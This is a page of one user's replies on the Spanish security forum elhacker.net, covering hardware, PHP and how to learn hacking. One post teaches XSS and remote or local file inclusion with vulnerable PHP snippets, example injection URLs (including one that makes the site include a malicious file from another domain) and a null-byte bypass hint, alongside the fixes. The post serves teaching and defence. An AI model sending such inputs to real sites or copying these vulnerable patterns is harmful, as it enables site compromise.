elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 237
101  Informática / Hardware / Re: ¿Puedo combinar 2 modelos distintos de memoria Ram? en: 16 Enero 2013, 04:33 am
Sólo para complementar, es cierto que si pones 2 memorias de distinta frecuencia tendrás un cuello de botella, pero además la más lenta se forzará más y podría dañarse a la larga, así que personalmente no te lo recomiendo.
102  Foros Generales / Foro Libre / Re: ¿Por qué tanto odio hacia Bill Gates? en: 16 Enero 2013, 04:28 am
Sea para evadir impuestos o por amor a la humanidad, es dinero que termina haciéndole bien a alguien más y eso se aplaude.

Bill Gates es inteligente, así como Mark Zuckerberg, y los dueños de empresas grandes que comen empresas pequeñas al desayuno
103  Sistemas Operativos / GNU/Linux / Re: Freezar linux en: 16 Enero 2013, 02:06 am
En teoría con Ofris, pero no pude instalarlo cuando trate, prueba a ver si encuentras algo
104  Programación / PHP / Re: como cerrar sesiones en php en: 16 Enero 2013, 02:04 am
Pon aquí el código de como estas asignando valor a la sesión y como la estás cerrando
105  Programación / PHP / Re: [?][PHP]Procesar variable php de formulario en: 11 Enero 2013, 23:01 pm
Basta con asignar un value a la opción y después procesarla con tu php o poner en tu default (else sólo) la query que muestre todo por defecto.
106  Foros Generales / Foro Libre / Re: ¿Como devolveríais los trastos a una cajera? en: 7 Enero 2013, 20:49 pm
Nada xD soy timido
107  Seguridad Informática / Bugs y Exploits / Re: Explotar PHP en: 7 Enero 2013, 20:39 pm
Mira, te doy 2 ejemplos vulnerables para que lo entiendas mejor mejor:

1) Esto seria vulnerable a XSS:

Código
  1. <?php
  2. $action = $_GET['action'];
  3. echo 'Bienvenido a la sección: '.$action;
  4. ?>
  5.  

Aqui si pones por ejemplo lo siguiente para explotar la vulnerabilidad

Código:
tudominio.com/index.php?action=hola<h1>esto es codigo html inyectado</h1>

Y se corrige con:

Código
  1. <?php
  2. $action = htmlspecialchars($_GET['action'], ENT_QUOTES);
  3. echo 'Bienvenido a la sección: '.$action;
  4. ?>
  5.  

2)Esto seria vulnerable a RFI y LFI:

Código
  1. <?php
  2. $section = $_GET['section'];
  3. include($section);
  4. ?>
  5.  

Aqui si pones por ejemplo lo siguiente para explotar la vulnerabilidad

Código:
tudominio.com/index.php?action=http://otrodominio.com/archivomalo.php

Ojo que la solución para esto puede ser tan simple como poner en la variable una extension y un directorio tipo include ('includes/'.$section.'.php') tambien debes tener cuidado en los caracteres que permites en la variable, por ejemplo a veces pueden saltarse la extension con un byte nulo por ejemplo asi que cuidado.
108  Seguridad Informática / Hacking / Re: Que debo estudiar en: 7 Enero 2013, 17:41 pm
Bueh para ser "Hacker" debes saber de todo, C, C++, Java, Phyton, PHP, ASM, .NET, C#, JS, Batch, SQL y lenguaje que se te cruce, para ahorrarte todo eso aprende algoritmia, con el tiempo veras que programar en Java y C++ por ejemplo es basicamente lo mismo, claro son lenguajes distintos, pero la base es la misma. Para entender lo que te digo sobre lo de que la base es la misma debes aprender lo que son los paradigmas de programación, te cito un trozo de la wikipedia:

  • Imperativo o por procedimientos: es considerado el más común y está representado, por ejemplo, por C, BASIC o Pascal
  • Funcional: está representado por Scheme o Haskell. Este es un caso del paradigma declarativo.
  • Lógico: está representado por Prolog. Este es otro caso del paradigma declarativo.
  • Declarativo: por ejemplo la programación funcional, la programación lógica, o la combinación lógico-funcional.
  • Orientado a objetos: está representado por Smalltalk, un lenguaje completamente orientado a objetos.

Despues de ver paradigmas y algoritmia, puedes empezar a aprender a programar en algun lenguaje tipo C, que es el que enseñan en universidades, institutos u otros para entender lo antes mencionado viendolo con un lenguaje, no profundices en C, basta con hacer un par de programas simples (hechos por ti claro, no copiados), ademas aprenderas que es compilar y debuguear una aplicación. Aprendiendo C, te sera facil entender lenguajes como PHP o similares por lo que te dije al principio.

Ademas, a medida de que aprendas te daras cuenta de que vas encontrando errores en tus programas, uno comun que me atreveria a decir que nos ha ocurrido a todos es al ingresar un String o Cadena en una variable Integer (o Entero), con esto tendras que aprender a validar tus variables y asi evitar errores o vulnerabilidades.

Junto con programación debes aprender a usar distintos Sistemas Operativos (Windows, Linux y Mac) comodamente. Tambien es importante aprender a buscar información fidedigna, esto por lo general se encuentra en las paginas oficiales del lenguaje que estes usando, por ejemplo para PHP buscas en php.net aunque Google nunca esta de mas para ninguno.

Despues aprende sobre vulnerabilidades (Recien!) aunque en el camino probablemente hayas aprendido y entendido ya algunas de las mas basicas.

Con eso mas o menos, podrias llamarte a ti mismo "Un Hacker", aunque un Hacker no es mas que un "ideal" de Informatico y nada mas que eso.
109  Seguridad Informática / Hacking / Re: Que debo estudiar en: 7 Enero 2013, 03:52 am
Mira lo que te respondi en tu otro mensaje y te daras cuenta de que si te lei bien.
110  Seguridad Informática / Bugs y Exploits / Re: Ayuda con vulnerabilidades en páginas en: 7 Enero 2013, 03:49 am
Primero un poco sobre la ley:

http://foro.elhacker.net/nivel_web/eres_un_hacker_chileno-t301969.0.html En tu pais quizas no sea igual, pero alguna similitud tendra.

Aqui tienes algunos conceptos y temas que te conviene leer:

http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_31510-t244090.0.html

No olvides las reglas:

http://foro.elhacker.net/nivel_web/reglas_del_subforo_bugs_y_exploits_a_nivel_web_lee_esto_antes_de_postear-t254616.0.html

Un glosario con los principales terminos utilizados en seguridad:

http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html

Como iniciarse en la seguridad web:

http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html

Por ultimo deja de escribir con letras de colores y tomate la informatica con mas respeto y seriedad, entiende que es ser un hacker, aprende a construir y protegerte antes de destruir. Aclara tus conceptos y no uses software de terceros, aprende a hacer las cosas por ti mismo.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 237
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines